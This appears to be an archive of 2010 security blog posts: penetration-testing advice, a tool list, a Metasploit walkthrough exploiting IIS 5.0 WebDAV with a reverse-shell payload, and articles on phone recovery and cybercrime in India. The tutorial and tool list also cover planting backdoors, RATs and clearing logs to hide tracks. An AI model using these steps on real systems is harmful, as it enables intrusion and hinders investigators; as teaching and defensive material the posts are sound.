Saturday, November 27, 2010

Ideal Skill Set for Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.


1. Mastery of an operating system. I can’t stress enough how important this is. So many people want to become hackers or systems security experts without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?


2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know the structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing; be able to describe in detail how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?


3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP spoof or a MiTM attack actually works. In short, how can you violate or manipulate a process if you don’t even know how the process works, or worse, you don’t even know the process exists? Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see one work, the first thing that comes to my mind is “how does it work?”


4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).


5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on eBay, or maybe ask your company for old ones. Start with simple ACLs on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s no better way to understand these concepts than to apply them. Once you’ve mastered this, you can move to a PIX or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.


6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.


7. Eventually learn a programming language, then learn a few more. Don’t go and buy a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!


8. Have a desire and drive to learn new stuff. This is a must; it’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for) to really get a handle on things and stay up to date.


9. Learn a little about databases, and how they work. Go download MySQL, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs helps.


10. Always be willing to interact and share your knowledge with like-minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery or janitorial work; one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.


Reference: www.google.com

Jose Penetration Tools List

Let me just say that I may use BackTrack in any phase.

Phase 1 Passive Reconnaissance

1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers)
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use it in almost every phase. I want to see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)

Phase 2 Scanning

1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute

Phase 3 Vulnerability Research

1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.

Phase 4 Penetration/Hacking

Breaking in

1. Manual exploit code
2. Metasploit
3. Core Impact (large scale: 5000 or more nodes to penetrate)

Password Cracking

1. Kerb Crack
2. Pwdump
3. Cain & Abel
4. John the Ripper
5. Rainbow Crack
6. Hydra

Trojans & Rootkit

1. I usually make my own. But some good PoC ones are Poison Ivy, Nuclear RAT, and NetBus.

Phase 5 Going Deeper

1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or sends packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. OllyDbg (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)

Phase 6 Covering Tracks

1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to...)

Wednesday, November 17, 2010

Metasploit Tutorial

How tough is it to really compromise a system? As an ethical hacking instructor, that is a question that I get asked quite frequently. My usual response to this type of question is to encourage the questioner to try to compromise a system which they own, to find out the time and skill necessary to compromise a system. There is real value in getting a true sense of what it really takes to actually defeat common security measures. This provides first-hand experience that cannot really be duplicated from listening to an industry expert or from reading articles and books. The main reason for this is that there is a lot of misinformation available, some intentional and some not. The easiest way to determine just how difficult something like compromising systems or defeating wireless encryption is, is to try it for yourself.
Most security professionals are aware that attacking and penetrating network devices is getting easier while attacks are getting more sophisticated. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers uncovered the security weaknesses in common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to perform more complex attacks than ever thought possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing system penetration. Products like Core Security's Core Impact and Immunity's Canvas (see post: Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology, but they also provide training and support for their products to allow a qualified professional to perform a more methodical penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including perl, C, and assembler.
This environment provides many ready to use exploits and also allows for the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate the system using this specific utility. The basic format for exploiting the system is as follows:

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

While this process is much more difficult to do than just a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared and that utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it cannot be denied that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system; the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers them, and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application, and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above. That way, if someone ever mentions the difficulty involved in compromising a system, you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
# ./msfconsole
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stem from the following commands:

* use
* show
* info

The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST" followed by the target IP address and press enter. On the next line type "set RPORT 80"
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets
Supported Exploit Targets
=========================
0 Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that most of the payloads in the Metasploit™ framework will work for only certain OS’s and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. The commands mentioned before in the exploits section also apply to the payloads section. If you type "show payloads" you should see a response like the below.
msf iis50_webdav_ntdll > show payloads
Metasploit™ Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options

Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required RHOST 67.36.70.19 The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command as above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) looking for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (a bit like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces on your Linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:03:25:13:43:F2
inet addr:10.5.14.173 Bcast:10.5.15.255 Mask:255.255.252.0
inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3696580 (3.5 MiB) TX bytes:325618 (317.9 KiB)
Interrupt:193 Base address:0x4c00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:213 errors:0 dropped:0 overruns:0 frame:0
TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:49707 (48.5 KiB) TX bytes:49707 (48.5 KiB)
What we are interested in is the value for eth0 (or whatever is active on your system; it could be eth1 or some other interface). You should see "inet addr:" with your IP address listed next to it. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. Go ahead and look; no one will laugh, I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST" followed by your local IP address. This is all that really needs to be set, but for luck I always make one more change: I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out, be my guest and change it.
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced
Exploit and Payload Options
===========================

Exploit (Msf::Exploit::iis50_webdav_ntdll):
-------------------------------------------
Payload (Msf::Payload::win32_reverse):
--------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next; after all, where is the fun in that? Don't trash the system too badly if you want to exploit it again. You might want to try to crack the passwords, or you can create your own netcat backdoor.
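From the defender's side, the exploit output above is noisy: the offset brute force sends one oversized WebDAV request per return address tried, and every attempt lands in the IIS log. The following added example (my own code, not from the original post) parses constructed IIS W3C extended log lines and flags any client that sends repeated, unusually large WebDAV requests; the field list, size threshold and attempt count are assumptions for illustration.

```python
"""Flag brute-force style WebDAV overflow attempts in IIS W3C extended logs.

Added example, not part of the original post. Assumes the W3C extended format
with a '#Fields:' header line; the log lines below are constructed samples.
"""
from collections import defaultdict

# WebDAV verbs handled by the IIS WebDAV extension the walkthrough targets.
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK", "MKCOL"}
# Assumption: legitimate WebDAV requests are a few KB; the exploit above sent ~65 KB.
LARGE_REQUEST_BYTES = 60000
# The offset brute force issues one request per return address, so look for repeats.
MIN_ATTEMPTS = 3

# Constructed sample log: four oversized SEARCH requests from one client,
# followed by ordinary traffic from another.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem s-port sc-status cs-bytes
2010-11-17 10:01:02 10.5.14.173 SEARCH / 80 500 65739
2010-11-17 10:01:03 10.5.14.173 SEARCH / 80 500 65739
2010-11-17 10:01:04 10.5.14.173 SEARCH / 80 500 65739
2010-11-17 10:01:05 10.5.14.173 SEARCH / 80 500 65739
2010-11-17 10:02:00 10.5.14.9 GET /default.htm 80 200 312
2010-11-17 10:02:30 10.5.14.9 PROPFIND /docs/ 80 207 540
"""


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip records that do not match the declared header
        yield dict(zip(fields, values))


def find_overflow_attempts(text, large=LARGE_REQUEST_BYTES, min_attempts=MIN_ATTEMPTS):
    """Return {client_ip: [(date, time, method, bytes), ...]} for clients that sent
    at least `min_attempts` WebDAV requests of `large` bytes or more."""
    hits = defaultdict(list)
    for rec in parse_w3c(text):
        try:
            size = int(rec.get("cs-bytes", "0"))
        except ValueError:
            continue  # malformed size field; ignore the record
        if rec.get("cs-method") in WEBDAV_METHODS and size >= large:
            hits[rec["c-ip"]].append((rec["date"], rec["time"], rec["cs-method"], size))
    return {ip: events for ip, events in hits.items() if len(events) >= min_attempts}


if __name__ == "__main__":
    for ip, events in find_overflow_attempts(SAMPLE_LOG).items():
        print(f"{ip}: {len(events)} oversized WebDAV requests, first at {events[0][1]}")
```

The same pass also works as a quick post-incident check of an archived log, since the repeated 500 responses and identical request sizes survive even when the attempt itself failed.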
Metasploit™ – available from http://www.metasploit.com
It is not essential that the user boot a Linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.

Saturday, November 13, 2010

Cops say lost mobile phones can be easily recovered if police complaint is filed

CHENNAI : Most people who lose their mobile phone do not file a police complaint as they believe the chances of recovering their phone are minimal. However, according to the Chennai suburban police, it is almost certain that you would get back your phone if you file a police complaint with the International Mobile Equipment Identity (IMEI) number.

Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.

"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.

Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.

Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is a unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered.)

Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s

Friday, November 12, 2010

The state of cyber crime awareness amongst the law enforcement agencies

In an instance of a cyber crime investigation in India, a police officer was asked to seize the computer of the hacker. What he brought from the hacker’s premises was his monitor. In another similar instance, the police officials seized the memory and the CD-ROM drive of a hacker’s computer instead of taking out the hard disk.

If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.

Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.

In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.

By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.

Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.

This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.

Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.

In addition to this the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.

Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”

All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!

Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”

Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in the physical criminal world, criminals who specialize in different things: criminals who burgle houses, criminals who buy and sell stolen property; there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”

Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.

Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”

Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.

Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.

Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”

Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.

They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”

Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now that cyber terrorism is in the picture, and although it has been termed a heinous offence carrying life imprisonment as the penalty, Duggal felt that many mechanisms for investigation and prosecution in cyber terrorism cases still needed to evolve. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given fast track courts rather than go to ordinary trial, a process that drags on for years.

According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. Those were the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”

That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.

Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.

“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.

According to Fadia, “An organization like an Internetpol, which is an international body that operates on cross-border investigations, is really required. The problem that every country faces today is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or the Interpol for Internet security currently exist. Every country wants to protect their own citizens; they would never cooperate in such an investigation.”

The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.

Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.

Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actual number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered with, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”

Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.

The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For example, under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”

Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. However, he admits that most offences under the IT Act 2008 have been made bailable, but argues that this is to serve a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive etc.

In case you send an e-mail to a company, the virus would be sent along with it and the company can press charges against you for causing harm to their systems. Though you did it unknowingly, you can be proved guilty. Now, if this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why many offences have been made bailable under the amended IT Act.

Another reason for making the offences bailable pertains to the fact that due to low awareness and knowledge about technology (amongst police, lawyers as well as the judges), cyber crime related cases take a long time to resolve. In such cases, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.

According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”

Plan of action
Enhancing the law is one issue; the law then needs to be properly implemented. There must be an appropriate orientation and awareness of how the law needs to be applied. Then there need to be fast track courts. Another major problem is the non-citizen-friendly interface of the law enforcement agencies. Getting an FIR registered is a herculean task in any cyber crime case.

It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.

The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.

CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is currently being done in association with the Data Security Council of India, Nasscom and Google.

Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.

When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.

Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.

One of the basic things that people can do is to ensure they have a virtual team comprising their networking staff, their sysadmins and Web and database administrators, who can be called together and can work together. Another effective thing that they need to do is to have an understanding as to who their ISPs are and who their operational security contact is who can be reached if there is a problem.

There are a lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”

